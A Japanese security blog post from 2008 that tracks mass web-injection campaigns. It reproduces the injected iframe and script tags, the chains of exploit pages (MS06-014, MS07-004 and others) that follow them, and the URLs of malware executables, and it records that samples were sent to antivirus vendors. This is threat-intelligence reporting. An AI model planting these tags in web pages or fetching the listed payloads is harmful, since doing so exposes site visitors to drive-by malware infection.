ハルコタン紀行

インジェクション

WindowsVistaSP1に続き、WindowsXPSP3がリリースされました。早めに適用しておきましょう。
リリース記念というわけではありませんが、不定期連載のインジェクション。

IBM ISS SOCレポート2008年04月28日。
4月28日16:00より、新たに「www.pkck.cn」からの攻撃が確認されており、攻撃の拡散化が懸念されます。
<iframe src="http://www.pkck.cn/web.htm"></iframe>
web.htm
→mm.htm
 →wz.htm (ダミー)
 →wu.htm
  →いつものCuteQQ群
   (Ms06014.htm Ms06067.htm Ms07004.htm Ms07033.htm Ms07055.htm
    Ajax.htm Bfyy.htm Lz.htm Pps.htm Real.htm XunLei.htm)
Google先生に尋ねてみたところ、この攻撃はあまり成功していないようです。

また、以前に書いたnihaorr1の続報ですが、UN(国連)のサイトにまで注入されていたようです。
実行ファイルが変更され、合わせてスクリプトも変更されています。
下記ドメイン群(もっとあるかも)に設置されているスクリプトも呼び出します。
baoma999.com benchi999.com buhaoyishi.com haoliuliang.net haowangma.com tianxiayouzei.com zuiyige.com

さらに、新顔を2つ。

Google先生に尋ねてみたところ、以下の2つの攻撃はそれなりに成功しているようです。
<script src="http://winzipices.cn/1.js"></script>
(略)
<script src="http://winzipices.cn/5.js"></script>
同じ内容で1.jsから5.jsまであり、それぞれaspを経由します。
1.js→1.asp
2.js→2.asp
3.js→3.asp
4.js→4.asp
5.js→5.asp
これらのaspは解析を防ぐためか2回目のアクセスでは何も返ってきませんが、
なぜかHTTP 404にも設定されており、fuck.htm など
存在しないファイル名でアクセスすれば取得できます。
1.js
→1.asp
 →test.htm (ダミー)
 →pp.htm
  →pp.js
   →6.gif
    →old.gif
    →xin.gif
    →le.gif
    →vv.js
   →7.gif
    →old.gif
    →xin.gif
上記gifは全てスクリプトで、6.gifがIE6用、7.gifがIE7用です。
単純にIE6のほうがやられる可能性は高いです。

<script src="http://bbs.jueduizuan.com/ip.js"></script>
<script src="http://www.ririwow.cn/ip.js"></script>
ip.js
→index.htm
 →14.htm
 →07004.htm
 →real.htm
 →real11.htm
こちらは比較的単純です。

http://www.pkck.cn/system.exe
2008-04-22 GMT


www.nihaorr1.com
http://61.188.39.214/1.exe
2008-05-03 GMT

baoma999.com benchi999.com buhaoyishi.com haoliuliang.net haowangma.com tianxiayouzei.com zuiyige.com
に設置されていファイル( nbd.cab 014.exe )は省略します。

winzipices.cn
http://61.188.38.158/images/test.exe
2008-05-06 GMT


bbs.jueduizuan.com
www.ririwow.cn
http://www.bluell.cn/ri.exe
2008-05-06 GMT


検体は各社に提出済みです。

追記の追記(2008-05-09)。
bbs.jueduizuan.com が無くなり
www.ririwow.cn
→http://www.bluell.cn/ri.exe
のみとなりました。

追記の追記の追記(2008-05-10)。
www.ririwow.cn
→http://dj.jueduizuan.com/ri.exe
となりました。また、
www.ririwow.cn/index.htm
にこんな文が追記されています。
FUCK FRANCE! FUCK CNN! I WILL ATTACK you ALWAYS !
IF YOU WANT TO SAY SOMETHING .
PLEASE SEND EMAIL TO (メールアドレスなので略)
チベットのことでお怒りのようです。
<script src="http://www.kisswow.com.cn/m.js"></script>
→www.ririwow.cn/index.htm

<script src="http://computershello.cn/1.js"></script>
→2.js→winzipices.cn/5.js
というのもあるようです。

ついでに aspder.com が復活しています。
1.htmからは以下のファイル群が呼ばれます
(Ajax.htm cuteqq.htm McAfee.htm Real.htm Yahoo.php
Ms06014.htm Ms07004.htm Ms07055.htm)。
→http://61.188.39.214/2.exe
さらにcuteqq.htmからは http://www.11910.net/ の以下のファイル群が呼ばれます
(Ajax.htm Bfyy.htm Lz.htm Real.gif XunLei.htm Ms06014.htm)。
こちらはホストに繋がりません。
<script src="http://www.11910.net/1.js"></script>
というのもあったようです。

いろいろと流動的なので追記はこの辺にしておきます。

テーマ:セキュリティ - ジャンル:コンピュータ

  1. 2008/05/07(水) 19:51:32|
  2. ウイルス
  3. | トラックバック:0
  4. | コメント:0
<<倉庫キャラの冒険 | ホーム | モンク20>>

コメント

コメントの投稿


管理者にだけ表示を許可する

トラックバック

トラックバック URL
http://ilion.blog47.fc2.com/tb.php/32-79b10cf3
この記事にトラックバックする(FC2ブログユーザー)